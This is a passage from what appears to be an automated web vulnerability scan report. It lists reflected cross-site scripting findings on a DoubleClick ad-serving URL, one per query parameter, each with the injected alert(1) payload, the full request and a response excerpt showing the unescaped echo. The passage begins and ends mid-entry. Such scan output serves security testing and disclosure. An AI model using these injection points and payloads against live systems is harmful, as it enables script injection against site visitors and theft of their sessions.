GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE5aec1"-alert(1)-"4e981761ccd&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:42:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE5aec1"-alert(1)-"4e981761ccd&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...

3.338. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92bdb"-alert(1)-"9c5ea4cfe06 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=92bdb"-alert(1)-"9c5ea4cfe06&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:40:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=92bdb"-alert(1)-"9c5ea4cfe06&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.games
...[SNIP]...

3.339. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8622"-alert(1)-"e786040c9e9 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100f8622"-alert(1)-"e786040c9e9&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:40:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100f8622"-alert(1)-"e786040c9e9&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox
...[SNIP]...

3.340. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [ppartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2487f"-alert(1)-"1ded3a37738 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=2487f"-alert(1)-"1ded3a37738&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:41:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
s%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=2487f"-alert(1)-"1ded3a37738&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%
...[SNIP]...

3.341. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ea16"-alert(1)-"a10ba2a89b8 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=20008ea16"-alert(1)-"a10ba2a89b8&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:39:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
%3B63339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=20008ea16"-alert(1)-"a10ba2a89b8&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http:/
...[SNIP]...

3.342. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [ra parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9546"-alert(1)-"7b77c2ee631 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243a9546"-alert(1)-"7b77c2ee631&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:42:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243a9546"-alert(1)-"7b77c2ee631&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2");
var fscUrl = url;
var fscUrlClickT
...[SNIP]...

3.343. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [rqid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17d09"-alert(1)-"5e5c704d50f was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB23817d09"-alert(1)-"5e5c704d50f&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:40:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB23817d09"-alert(1)-"5e5c704d50f&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cart
...[SNIP]...

3.344. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [sg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9ee8"-alert(1)-"62439e03c07 was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581c9ee8"-alert(1)-"62439e03c07&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:38:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
et/click%3Bh%3Dv8/3af6/17/145/%2a/j%3B240444525%3B0-0%3B0%3B63339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581c9ee8"-alert(1)-"62439e03c07&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6Thqi
...[SNIP]...

3.345. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72f1a"-alert(1)-"8e6667033a8 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=672f1a"-alert(1)-"8e6667033a8&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:39:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
B0-0%3B0%3B63339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=672f1a"-alert(1)-"8e6667033a8&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=5
...[SNIP]...

3.346. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload beac5"-alert(1)-"40fb5314426 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108beac5"-alert(1)-"40fb5314426&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:38:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6917

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
bleclick.net/click%3Bh%3Dv8/3af6/17/145/%2a/j%3B240444525%3B0-0%3B0%3B63339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108beac5"-alert(1)-"40fb5314426&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.24
...[SNIP]...

3.347. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.3

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b85a"-alert(1)-"6cc9e163664 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.346b85a"-alert(1)-"6cc9e163664&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
